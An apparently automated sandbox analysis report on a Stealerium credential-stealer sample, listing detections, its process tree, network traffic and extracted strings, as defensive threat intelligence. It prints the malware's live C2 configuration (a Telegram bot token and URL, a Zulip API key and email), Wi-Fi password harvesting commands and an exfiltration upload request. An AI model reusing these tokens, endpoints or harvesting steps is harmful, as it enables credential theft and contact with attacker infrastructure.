Windows Analysis Report
K6aOw2Jmji.exe

Overview

General Information

Sample name: K6aOw2Jmji.exe (renamed because original name is a hash value)
Original sample name: 09f6e63d0518f1bebd5b74b8a4ba868d0843bc85922e85aefd94d20405e858d2.exe
Analysis ID: 1565209
MD5: 98a0c65bc0fe05d40971716ffd216519
SHA1: 29725d1d174fb10d919a6f5b5f5ca2d2d83485af
SHA256: 09f6e63d0518f1bebd5b74b8a4ba868d0843bc85922e85aefd94d20405e858d2
Tags: exe, virustotal-vm-blacklist, user-JAMESWT_MHT

Detection

Stealerium
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Yara detected Stealerium
Yara detected Telegram RAT
Yara detected Telegram Recon
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to capture screen (.Net source)
Contains functionality to log keystrokes (.Net Source)
Drops password protected ZIP file
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for sample
Modifies existing user documents (likely ransomware behavior)
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses netsh to modify the Windows network and firewall settings
Uses the Telegram API (likely for C&C communication)
Yara detected Costura Assembly Loader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file does not import any functions
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • K6aOw2Jmji.exe (PID: 6400 cmdline: "C:\Users\user\Desktop\K6aOw2Jmji.exe" MD5: 98A0C65BC0FE05D40971716FFD216519)
    • cmd.exe (PID: 5596 cmdline: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 3636 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 6696 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • netsh.exe (PID: 3912 cmdline: netsh wlan show profile MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
      • findstr.exe (PID: 6968 cmdline: findstr All MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
    • cmd.exe (PID: 7248 cmdline: "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7256 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 7296 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • netsh.exe (PID: 7312 cmdline: netsh wlan show networks mode=bssid MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
    • WerFault.exe (PID: 7512 cmdline: C:\Windows\system32\WerFault.exe -u -p 6400 -s 3132 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • msiexec.exe (PID: 7056 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
  • cleanup
Name: Stealerium
Description: According to SecurityScorecard, Stealerium is an open-source stealer available on GitHub. The malware steals information from browsers, cryptocurrency wallets, and applications such as Discord, Pidgin, Outlook, Telegram, Skype, Element, Signal, Tox, Steam, Minecraft, and VPN clients. The binary also gathers data about the infected host, such as the running processes, Desktop and webcam screenshots, Wi-Fi networks, the Windows product key, and the public and private IP address. The stealer employs multiple anti-analysis techniques, such as detecting virtual machines, sandboxes, and malware analysis tools and checking if the process is being debugged. The malware also embedded a keylogger module and a clipper module that replaces cryptocurrency wallet addresses with the threat actors' addresses if the victim makes a transaction. The stolen information is sent to a Discord channel using a Discord Webhook.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealerium
{"C2 url": "https://api.telegram.org/bot7785245272:AAH0cMtovkeY5pOmhg0m00YxvD3gghupGfE/sendMessage", "Telegram Stream": [{"ok": true, "result": {"id": 7785245272, "is_bot": true, "first_name": "stealirum", "username": "stealirum_bot", "can_join_groups": true, "can_read_all_group_messages": false, "supports_inline_queries": false, "can_connect_to_business": false, "has_main_web_app": false}}]}
{"C2 url": "https://szurubooru.zulipchat.com/api/v1/messages", "User": "szurubooru@gmail.com", "API key": "fgwT5umbrQdW6Y1buIWZJK6S2FVQZAeS"}
Source: K6aOw2Jmji.exe, Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Author: Joe Security
Source: K6aOw2Jmji.exe, Rule: JoeSecurity_Stealerium, Description: Yara detected Stealerium, Author: Joe Security
Source: K6aOw2Jmji.exe, Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Author: Joe Security
Source: K6aOw2Jmji.exe, Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Author: Joe Security
Source: K6aOw2Jmji.exe, Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Author: ditekSHen, Strings:
  • 0x386316:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}|mfa\.[a-zA-Z0-9_\-]{84}

Source: C:\Users\user\AppData\Local\cd25dd7bb63c454ece9a13d4ee42da59\user@910646_en-CH.zip, Rule: JoeSecurity_Stealerium, Description: Yara detected Stealerium, Author: Joe Security

Source: 00000000.00000002.2156264198.00000267806FD000.00000004.00000800.00020000.00000000.sdmp, Rule: JoeSecurity_Stealerium, Description: Yara detected Stealerium, Author: Joe Security
Source: 00000000.00000002.2156264198.0000026780643000.00000004.00000800.00020000.00000000.sdmp, Rule: JoeSecurity_Stealerium, Description: Yara detected Stealerium, Author: Joe Security
Source: 00000000.00000002.2156264198.00000267805C3000.00000004.00000800.00020000.00000000.sdmp, Rule: JoeSecurity_Stealerium, Description: Yara detected Stealerium, Author: Joe Security
Source: 00000000.00000002.2156264198.00000267800DD000.00000004.00000800.00020000.00000000.sdmp, Rule: JoeSecurity_Stealerium, Description: Yara detected Stealerium, Author: Joe Security
Source: 00000000.00000002.2156264198.00000267800DD000.00000004.00000800.00020000.00000000.sdmp, Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Author: Joe Security

Source: 0.0.K6aOw2Jmji.exe.267e6f40000.0.unpack, Rule: JoeSecurity_Stealerium, Description: Yara detected Stealerium, Author: Joe Security
Source: 0.0.K6aOw2Jmji.exe.267e6f40000.0.unpack, Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Author: Joe Security
Source: 0.0.K6aOw2Jmji.exe.267e6f40000.0.unpack, Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Author: Joe Security
Source: 0.0.K6aOw2Jmji.exe.267e6f40000.0.unpack, Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Author: ditekSHen, Strings:
  • 0x386316:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}|mfa\.[a-zA-Z0-9_\-]{84}

Stealing of Sensitive Information

Source: Process started, Author: Joe Security, Data: Command: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, CommandLine: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\K6aOw2Jmji.exe", ParentImage: C:\Users\user\Desktop\K6aOw2Jmji.exe, ParentProcessId: 6400, ParentProcessName: K6aOw2Jmji.exe, ProcessCommandLine: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, ProcessId: 5596, ProcessName: cmd.exe

Timestamp: 2024-11-29T12:28:35.552128+0100, SID: 2803305, Severity: 3, Classtype: Unknown Traffic, Source IP: 192.168.2.4, Source Port: 49738, Destination IP: 104.16.185.241, Destination Port: 80, Protocol: TCP

AV Detection

Source: K6aOw2Jmji.exe, Avira: detected
Source: 00000000.00000000.1678272821.00000267E6F42000.00000002.00000001.01000000.00000003.sdmp, Malware Configuration Extractor: Stealerium {"C2 url": "https://szurubooru.zulipchat.com/api/v1/messages", "User": "szurubooru@gmail.com", "API key": "fgwT5umbrQdW6Y1buIWZJK6S2FVQZAeS"}
Source: K6aOw2Jmji.exe.6400.0.memstrmin, Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7785245272:AAH0cMtovkeY5pOmhg0m00YxvD3gghupGfE/sendMessage", "Telegram Stream": [{"ok": true, "result": {"id": 7785245272, "is_bot": true, "first_name": "stealirum", "username": "stealirum_bot", "can_join_groups": true, "can_read_all_group_messages": false, "supports_inline_queries": false, "can_connect_to_business": false, "has_main_web_app": false}}]}
Source: K6aOw2Jmji.exe, ReversingLabs: Detection: 68%
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 99.3% probability
Source: K6aOw2Jmji.exe, Joe Sandbox ML: detected
Source: K6aOw2Jmji.exe, String decryptor: 7785245272:AAH0cMtovkeY5pOmhg0m00YxvD3gghupGfE
Source: K6aOw2Jmji.exe, String decryptor: 1177295272
Source: K6aOw2Jmji.exe, String decryptor: https://api.telegram.org/bot
Source: K6aOw2Jmji.exe, String decryptor: https://szurubooru.zulipchat.com/api/v1/messages
Source: K6aOw2Jmji.exe, String decryptor: szurubooru@gmail.com
Source: K6aOw2Jmji.exe, String decryptor: fgwT5umbrQdW6Y1buIWZJK6S2FVQZAeS
Source: unknown, HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 45.112.123.126:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 31.14.70.244:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: K6aOw2Jmji.exe, Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Networking

Source: Malware configuration extractor, URLs: https://szurubooru.zulipchat.com/api/v1/messages
Source: unknown, DNS query: name: api.telegram.org
Source: global traffic, HTTP traffic detected: GET /6nz/virustotal-vm-blacklist/main/gpu_list.txt HTTP/1.1, Host: raw.githubusercontent.com, Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET /6nz/virustotal-vm-blacklist/main/pc_name_list.txt HTTP/1.1, Host: raw.githubusercontent.com, Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET /6nz/virustotal-vm-blacklist/main/pc_username_list.txt HTTP/1.1, Host: raw.githubusercontent.com, Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET /6nz/virustotal-vm-blacklist/main/processes_list.txt HTTP/1.1, Host: raw.githubusercontent.com, Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET /6nz/virustotal-vm-blacklist/main/MachineGuid.txt HTTP/1.1, Host: raw.githubusercontent.com, Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET /6nz/virustotal-vm-blacklist/main/ip_list.txt HTTP/1.1, Host: raw.githubusercontent.com, Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET /bot7785245272:AAH0cMtovkeY5pOmhg0m00YxvD3gghupGfE/getMe HTTP/1.1, Host: api.telegram.org, Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET /servers HTTP/1.1, Host: api.gofile.io, Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: POST /uploadfile HTTP/1.1, Content-Type: multipart/form-data; boundary="807f9f0a-5cc3-4dc0-ad4d-1aa9765d148e", Host: store5.gofile.io, Content-Length: 118763, Expect: 100-continue, Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET / HTTP/1.1, Host: icanhazip.com, Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET / HTTP/1.1, Host: icanhazip.com
Source: Joe Sandbox View, IP Address: 149.154.167.220
Source: Joe Sandbox View, IP Address: 185.199.108.133
Source: Joe Sandbox View, IP Address: 104.16.185.241
Source: Joe Sandbox View, JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown, DNS query: name: icanhazip.com
Source: Network traffic, Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49738 -> 104.16.185.241:80
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic, DNS traffic detected: DNS query: raw.githubusercontent.com
Source: global traffic, DNS traffic detected: DNS query: 54.229.13.0.in-addr.arpa
Source: global traffic, DNS traffic detected: DNS query: api.telegram.org
Source: global traffic, DNS traffic detected: DNS query: icanhazip.com
Source: global traffic, DNS traffic detected: DNS query: api.gofile.io
Source: global traffic, DNS traffic detected: DNS query: store5.gofile.io
Source: unknown, HTTP traffic detected: POST /uploadfile HTTP/1.1, Content-Type: multipart/form-data; boundary="807f9f0a-5cc3-4dc0-ad4d-1aa9765d148e", Host: store5.gofile.io, Content-Length: 118763, Expect: 100-continue, Connection: Keep-Alive
Source: K6aOw2Jmji.exe, 00000000.00000002.2156264198.000002678017F000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://api.gofile.io
                            Source: K6aOw2Jmji.exe, 00000000.00000002.2158644131.0000026790070000.00000004.00000800.00020000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2158644131.000002679014F000.00000004.00000800.00020000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2163306563.00000267E9DA8000.00000004.00000020.00020000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2164030324.00000267EA190000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                            Source: K6aOw2Jmji.exe, 00000000.00000002.2158644131.0000026790070000.00000004.00000800.00020000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2158644131.000002679014F000.00000004.00000800.00020000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2164030324.00000267EA190000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                            Source: K6aOw2Jmji.exe, 00000000.00000002.2158644131.0000026790070000.00000004.00000800.00020000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2158644131.000002679014F000.00000004.00000800.00020000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2164030324.00000267EA190000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0F
                            Source: K6aOw2Jmji.exe, 00000000.00000002.2158644131.0000026790070000.00000004.00000800.00020000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2158644131.000002679014F000.00000004.00000800.00020000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2164030324.00000267EA190000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0=
                            Source: K6aOw2Jmji.exe, 00000000.00000002.2156264198.00000267800DD000.00000004.00000800.00020000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2156264198.00000267805C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://icanhazip.com
                            Source: K6aOw2Jmji.exe, 00000000.00000002.2164030324.00000267EA190000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://james.newtonking.com/projects/json
                            Source: K6aOw2Jmji.exe, 00000000.00000002.2158644131.0000026790070000.00000004.00000800.00020000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2158644131.000002679014F000.00000004.00000800.00020000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2164030324.00000267EA190000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                            Source: K6aOw2Jmji.exe, 00000000.00000002.2158644131.0000026790070000.00000004.00000800.00020000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2158644131.000002679014F000.00000004.00000800.00020000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2164030324.00000267EA190000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                            Source: K6aOw2Jmji.exe, 00000000.00000002.2163346779.00000267E9DBC000.00000004.00000020.00020000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2158644131.0000026790070000.00000004.00000800.00020000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2158644131.000002679014F000.00000004.00000800.00020000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2164030324.00000267EA190000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0O
                            Source: K6aOw2Jmji.exe, 00000000.00000002.2158644131.0000026790070000.00000004.00000800.00020000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2158644131.000002679014F000.00000004.00000800.00020000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2163306563.00000267E9DA8000.00000004.00000020.00020000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2164030324.00000267EA190000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                            Source: K6aOw2Jmji.exe, 00000000.00000002.2156264198.0000026780001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                            Source: K6aOw2Jmji.exe, 00000000.00000002.2156264198.000002678017F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://store5.gofile.io
                            Source: Amcache.hve.13.drString found in binary or memory: http://upx.sf.net
                            Source: K6aOw2Jmji.exe, 00000000.00000002.2163346779.00000267E9DBC000.00000004.00000020.00020000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2158644131.0000026790070000.00000004.00000800.00020000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2158644131.000002679014F000.00000004.00000800.00020000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2164030324.00000267EA190000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                            Source: tmpBD46.tmp.dat.0.dr, tmpA5ED.tmp.dat.0.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                            Source: K6aOw2Jmji.exe, 00000000.00000002.2156264198.000002678017F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.gofile.io
                            Source: K6aOw2Jmji.exe, 00000000.00000002.2156264198.000002678017F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.gofile.io/
                            Source: K6aOw2Jmji.exe, 00000000.00000002.2156264198.000002678017F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.gofile.io/servers
                            Source: K6aOw2Jmji.exe, 00000000.00000002.2156264198.0000026780066000.00000004.00000800.00020000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2156264198.000002678006C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                            Source: K6aOw2Jmji.exe, 00000000.00000002.2156264198.00000267800DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                            Source: K6aOw2Jmji.exe, 00000000.00000002.2156264198.00000267800DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7785245272:AAH0cMtovkeY5pOmhg0m00YxvD3gghupGfE/getMe
                            Source: tmpBD46.tmp.dat.0.dr, tmpA5ED.tmp.dat.0.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                            Source: tmpBD46.tmp.dat.0.dr, tmpA5ED.tmp.dat.0.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                            Source: tmpBD46.tmp.dat.0.dr, tmpA5ED.tmp.dat.0.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                            Source: tmpBD46.tmp.dat.0.dr, tmpA5ED.tmp.dat.0.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                            Source: tmpBD46.tmp.dat.0.dr, tmpA5ED.tmp.dat.0.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                            Source: tmpBD46.tmp.dat.0.dr, tmpA5ED.tmp.dat.0.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                            Source: K6aOw2Jmji.exe, 00000000.00000002.2158644131.0000026790070000.00000004.00000800.00020000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2158644131.000002679014F000.00000004.00000800.00020000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2164030324.00000267EA190000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/JamesNK/Newtonsoft.Json
                            Source: K6aOw2Jmji.exe, 00000000.00000002.2163140895.00000267E9D10000.00000004.08000000.00040000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2158644131.0000026790070000.00000004.00000800.00020000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2156264198.0000026780643000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/icsharpcode/SharpZipLib
                            Source: K6aOw2Jmji.exeString found in binary or memory: https://github.com/kgnfth
                            Source: K6aOw2Jmji.exe, 00000000.00000002.2156264198.0000026780001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com
                            Source: K6aOw2Jmji.exeString found in binary or memory: https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/
                            Source: K6aOw2Jmji.exeString found in binary or memory: https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/MachineGuid.txt
                            Source: K6aOw2Jmji.exeString found in binary or memory: https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/gpu_list.txt
                            Source: K6aOw2Jmji.exeString found in binary or memory: https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/ip_list.txt
                            Source: K6aOw2Jmji.exeString found in binary or memory: https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/pc_name_list.txt
                            Source: K6aOw2Jmji.exeString found in binary or memory: https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/pc_username_list.txt
                            Source: K6aOw2Jmji.exeString found in binary or memory: https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/processes_list.txt
                            Source: K6aOw2Jmji.exe, 00000000.00000002.2158644131.0000026790070000.00000004.00000800.00020000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2162777253.00000267E9917000.00000004.00000020.00020000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2156264198.0000026780643000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/icsharpcode/SharpZipLib/33f64eb0f28cdd2b084cb822fcc224c7c5aba553/
                            Source: K6aOw2Jmji.exe, 00000000.00000002.2156264198.000002678017F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store5.gofile.io
                            Source: K6aOw2Jmji.exe, 00000000.00000002.2156264198.000002678017F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store5.gofile.io/X
                            Source: K6aOw2Jmji.exe, 00000000.00000002.2156264198.000002678017F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store5.gofile.io/uploadfile
                            Source: tmp871D.tmp.dat.0.drString found in binary or memory: https://support.mozilla.org
                            Source: tmp871D.tmp.dat.0.drString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                            Source: tmp871D.tmp.dat.0.drString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
                            Source: tmpA62E.tmp.dat.0.dr, tmpA64E.tmp.dat.0.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                            Source: tmpA62E.tmp.dat.0.dr, tmpA64E.tmp.dat.0.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                            Source: tmpA62E.tmp.dat.0.dr, tmpA64E.tmp.dat.0.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                            Source: tmpA62E.tmp.dat.0.dr, tmpA64E.tmp.dat.0.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                            Source: K6aOw2Jmji.exe, 00000000.00000002.2156264198.00000267800DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://szurubooru.zulipchat.com/api/v1/messages
                            Source: tmpBD46.tmp.dat.0.dr, tmpA5ED.tmp.dat.0.drString found in binary or memory: https://www.ecosia.org/newtab/
                            Source: tmpBD46.tmp.dat.0.dr, tmpA5ED.tmp.dat.0.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                            Source: tmp871D.tmp.dat.0.drString found in binary or memory: https://www.mozilla.org
                            Source: tmp871D.tmp.dat.0.drString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                            Source: tmp871D.tmp.dat.0.drString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                            Source: K6aOw2Jmji.exe, 00000000.00000002.2156264198.00000267806FD000.00000004.00000800.00020000.00000000.sdmp, History.txt0.0.drString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
                            Source: tmpEA9D.tmp.dat.0.dr, tmp871D.tmp.dat.0.drString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                            Source: tmp871D.tmp.dat.0.drString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                            Source: tmpEA9D.tmp.dat.0.dr, tmp871D.tmp.dat.0.drString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                            Source: K6aOw2Jmji.exe, 00000000.00000002.2163346779.00000267E9DBC000.00000004.00000020.00020000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2158644131.0000026790070000.00000004.00000800.00020000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2158644131.000002679014F000.00000004.00000800.00020000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2164030324.00000267EA190000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.newtonsoft.com/json
                            Source: K6aOw2Jmji.exe, 00000000.00000002.2164030324.00000267EA190000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.newtonsoft.com/jsonschema
                            Source: K6aOw2Jmji.exe, 00000000.00000002.2158644131.0000026790070000.00000004.00000800.00020000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2158644131.000002679014F000.00000004.00000800.00020000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2164030324.00000267EA190000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
